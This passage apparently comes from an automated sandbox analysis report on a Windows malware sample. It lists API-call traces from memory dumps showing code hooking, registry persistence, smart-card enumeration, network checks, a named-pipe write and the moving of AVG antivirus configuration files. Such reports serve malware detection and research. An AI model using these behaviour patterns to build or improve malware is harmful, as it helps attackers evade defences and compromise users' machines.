                                                                                                                                                                                                            • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                            • String ID: 698892b0a$software\microsoft
                                                                                                                                                                                                            • API String ID: 287100044-3865144223
                                                                                                                                                                                                            • Opcode ID: 2ddfe3d048bbadbefc164be5799ba2f99ef6b385b310f5b794357abd32c61b00
                                                                                                                                                                                                            • Instruction ID: e8ae4ab36f47a3ee8a0ea2401fe34e19b0b3e41f8a59cc8cc13faddb8886655b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ddfe3d048bbadbefc164be5799ba2f99ef6b385b310f5b794357abd32c61b00
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BF03C75A81218FBE720ABA09D49F9E7B78AB04741F904544FB02A7280D6716A108BE4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,76F8F550,00000000,753CBD50,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA578
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BCA5A0
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,?,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA635
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA64A
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,02BC98DA,?,?,?,00000000,00000000,?,?,?,?,?,?,02BC98DA,00000000), ref: 02BCA67A
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,02BC98DA,?,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA686
                                                                                                                                                                                                              • Part of subcall function 02BCA6B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02BCA693,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6BC
                                                                                                                                                                                                              • Part of subcall function 02BCA6B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6C6
                                                                                                                                                                                                              • Part of subcall function 02BCA6B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6CD
                                                                                                                                                                                                              • Part of subcall function 02BCA6B0: memset.MSVCRT ref: 02BCA6DE
                                                                                                                                                                                                              • Part of subcall function 02BCA6B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA72A
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,76F8F550,00000000,753CBD50,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA697
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA69E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2609073853-0
                                                                                                                                                                                                            • Opcode ID: 40c1a7ad85cfff5a5c9cf9136929f45ba2685fa0c6c19c23c8a9f65b88603b42
                                                                                                                                                                                                            • Instruction ID: 1d9525954b464bd3715ad2aa41e407b1b0aa722e1044ac8a64d1080cfb320eb2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40c1a7ad85cfff5a5c9cf9136929f45ba2685fa0c6c19c23c8a9f65b88603b42
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29412C72A0061AABCB10AE788CC4FBE7B6AEF80354F54467CE65597385DB35E901C7A0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02BD5A7F
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02BD5AB8
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD5B23
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD5B86
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                            • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$6988922Ca
                                                                                                                                                                                                            • API String ID: 2823094833-234750097
                                                                                                                                                                                                            • Opcode ID: 3e75261fae8a6938fa13fb433bc8da5d410697c29a3edd0af14d887439efb91e
                                                                                                                                                                                                            • Instruction ID: cb958ff692104d6db27df13fdbc8258174bfdb83d2c0d626fe95de9914bee7b0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e75261fae8a6938fa13fb433bc8da5d410697c29a3edd0af14d887439efb91e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8412D71A002199BD724CF688DC4BEEF7EAEF94300F9541E1D649AB181E7B16B49C750
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                            • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                            • API String ID: 3225117150-898603304
                                                                                                                                                                                                            • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                            • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8), ref: 02BCA7CB
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02BCA818
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02BCA847
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000), ref: 02BCA84E
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02BCA862
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 02BCA879
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCA881
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 842647815-0
                                                                                                                                                                                                            • Opcode ID: cd9f730931c5bed5b03d914691b88a2513a072b96d8a627bc33a5547000e557e
                                                                                                                                                                                                            • Instruction ID: e0a356b061ffd25b7a78c10dc231e58ebd6dd4ad5791d4e29f18d3d818da636e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd9f730931c5bed5b03d914691b88a2513a072b96d8a627bc33a5547000e557e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1216B75A40705EFD764CF19C988E2AB7B5FF48700F108958EA4A9B790C730F951CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02BC6A83,00000000), ref: 02BD5875
                                                                                                                                                                                                            • SCardListReadersA.WINSCARD(02BC6A83,00000000,?,FFFFFFFF), ref: 02BD588C
                                                                                                                                                                                                            • SCardConnectA.WINSCARD(02BC6A83,?,00000002,00000003,?,?), ref: 02BD58BE
                                                                                                                                                                                                            • SCardDisconnect.WINSCARD(?,00000000), ref: 02BD58E9
                                                                                                                                                                                                            • SCardFreeMemory.WINSCARD(02BC6A83,?), ref: 02BD5905
                                                                                                                                                                                                            • SCardReleaseContext.WINSCARD(02BC6A83), ref: 02BD5913
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Card$Context$ConnectDisconnectEstablishFreeListMemoryReadersRelease
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3231658416-0
                                                                                                                                                                                                            • Opcode ID: f640d35ec0cfcd900bb209f6140902435647115b3ac5b12a77ae648c7a5c05a6
                                                                                                                                                                                                            • Instruction ID: 973b43383da6ee514514c617eb5dd37149283a2f07e0575dbc816a0efd9814f0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f640d35ec0cfcd900bb209f6140902435647115b3ac5b12a77ae648c7a5c05a6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E2164B1E40309ABDB30CF95CC48FEEB7B9EF84744F544589E911A7141E771AA04CB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6E00
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: IsNetworkAlive.SENSAPI(02BB6E0D,00000000), ref: 02BC4F93
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: IsUserAnAdmin.SHELL32 ref: 02BC4FA1
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: DnsFlushResolverCache.DNSAPI ref: 02BC4FAB
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC4FC8
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,76F90F10), ref: 02BC4FE7
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02BC5000
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5013
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC502C
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,76F90F10), ref: 02BC5045
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02BC5058
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5065
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02BB6E1C
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02BB6E78
                                                                                                                                                                                                            • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,76F90F10,?,00000000,00000000), ref: 02BB6EA0
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02BB6EB8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$CheckConnectionInternetlstrcpyn$AdminAliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadUserWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2160739018-0
                                                                                                                                                                                                            • Opcode ID: b96785ae455cf112ce9493ca4a84dbad98cb09b84da9f0a6967be98fda9c8718
                                                                                                                                                                                                            • Instruction ID: 487439d21dd10252069fa1b175a6d99ac81accc591ca5244585bfa92dc6b2a99
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b96785ae455cf112ce9493ca4a84dbad98cb09b84da9f0a6967be98fda9c8718
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A21C5B5A802146BEB229B64DC81BFE336EEF44754F4106B4EB19A70C0D7F0ED818B95
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFindFileNameA.SHLWAPI(?), ref: 02BC80CA
                                                                                                                                                                                                            • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02BC8108
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02BC8123
                                                                                                                                                                                                            • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02BC812A
                                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02BC8151
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 433761119-0
                                                                                                                                                                                                            • Opcode ID: 2bbb1bb03d4f651f083ed3f93a5b58ab86b01d87fdf0024a010e3d911c1c3d16
                                                                                                                                                                                                            • Instruction ID: 8094b1f83d3529d8b7155c92eda68eccee411e29fabd78396c05c2adb715f5d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bbb1bb03d4f651f083ed3f93a5b58ab86b01d87fdf0024a010e3d911c1c3d16
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19210A31840219DBDB2287689C44BEA77E8EF19354F244AE8DA5597380DBB09A84CFE1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFindFileNameA.SHLWAPI(?), ref: 02BC80CA
                                                                                                                                                                                                            • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02BC8108
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02BC8123
                                                                                                                                                                                                            • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02BC812A
                                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02BC8151
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 433761119-0
                                                                                                                                                                                                            • Opcode ID: 587444ce1d92baeec4d7deecd34b9c22084bc780c3dbcc1a934e689eb32c365d
                                                                                                                                                                                                            • Instruction ID: b91d95f2af756ed5e137f77ae37f493e5f51fb55d282d4a2a4e42d478f11cc7b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 587444ce1d92baeec4d7deecd34b9c22084bc780c3dbcc1a934e689eb32c365d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26115431940219DBDB22CB64DC44BED77E8EF59344F244AE8D955A7380DBB09A84CFA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BB6AB4
                                                                                                                                                                                                              • Part of subcall function 02BB6980: memset.MSVCRT ref: 02BB69A2
                                                                                                                                                                                                              • Part of subcall function 02BB6980: memset.MSVCRT ref: 02BB69C0
                                                                                                                                                                                                              • Part of subcall function 02BB6980: lstrcpynA.KERNEL32(?,?,00000104), ref: 02BB69DD
                                                                                                                                                                                                              • Part of subcall function 02BB6980: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02BB6A4D
                                                                                                                                                                                                              • Part of subcall function 02BB6980: RegSetValueExA.ADVAPI32(?,698896B4a,00000000,00000001,?,00000104), ref: 02BB6A6F
                                                                                                                                                                                                              • Part of subcall function 02BB6980: RegCloseKey.ADVAPI32(?), ref: 02BB6A7D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB6AE4
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB6AE7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB6AF4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB6AF7
                                                                                                                                                                                                              • Part of subcall function 02BB6690: memset.MSVCRT ref: 02BB66B0
                                                                                                                                                                                                              • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB670F
                                                                                                                                                                                                              • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB671F
                                                                                                                                                                                                              • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB6729
                                                                                                                                                                                                              • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB6734
                                                                                                                                                                                                              • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB674F
                                                                                                                                                                                                              • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB675C
                                                                                                                                                                                                              • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB6766
                                                                                                                                                                                                              • Part of subcall function 02BB6690: exit.MSVCRT ref: 02BB6771
                                                                                                                                                                                                              • Part of subcall function 02BB6690: calloc.MSVCRT ref: 02BB6794
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: calloc$Heapexit$memset$Process$AdminCloseFreeOpenUserValidateValuelstrcpyn
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1728208919-0
                                                                                                                                                                                                            • Opcode ID: f71a3be06a67fa125f155c6a7d29025f0917bae97500b2132144957fc0733210
                                                                                                                                                                                                            • Instruction ID: 31d5e7ea1fad52ad0a1536c7053e0580023c254ace0d025ea0873b036627e372
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f71a3be06a67fa125f155c6a7d29025f0917bae97500b2132144957fc0733210
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EF0F63198122967DA316AB5EC08FEB7B5CEF81BA2F018521F605D3080C7F5D850CBE0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                            • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFolderMovePath
                                                                                                                                                                                                            • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                            • API String ID: 1404575960-1083204512
                                                                                                                                                                                                            • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                            • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7750FFB0,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49AD
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,02BC7967,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49CA
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49E2
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,02BC7967,00000000), ref: 02BD49F3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3228293703-0
                                                                                                                                                                                                            • Opcode ID: 381911d87b1bad2b66bac3061c0add07fd12278652e5c941723e37a791ca20a2
                                                                                                                                                                                                            • Instruction ID: 20e8fed7e2a8feb5a00b5e22634d69f215216d3b2d0eb8a7bc0a3b9afb40e912
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 381911d87b1bad2b66bac3061c0add07fd12278652e5c941723e37a791ca20a2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8211F1B1D01219AFCB10CFAAD8849EFFBFCFF98244F50815AEA05A7100D7745A55CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC6CA0,00000000,00000000,00000000), ref: 02BC77D4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC77EC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC77FD
                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 02BC7805
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4233414108-0
                                                                                                                                                                                                            • Opcode ID: c60d6498b46969b7713a6f2b8ea10fa9cd76efd13c0da95f6c9c50a74e8a6be3
                                                                                                                                                                                                            • Instruction ID: b6bc05bca25ebb2997f7e285991f76373217761a560e52b90375c0c492fe58e5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c60d6498b46969b7713a6f2b8ea10fa9cd76efd13c0da95f6c9c50a74e8a6be3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79E06530A85314B7F7714791DD0EF5E7AACDB00B45F700148FB00A60C0DBA06600D7A5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CA1
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CBF
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02BB6CDB
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: RegQueryValueExA.KERNEL32(?,698896B4a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6D02
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6D7A
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6D81
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6D95
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6DAE
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02BB6DBC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,76F90F10,00000000,02BCA2D3), ref: 02BC4A88
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC4A8B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC4A98
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC4A9B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
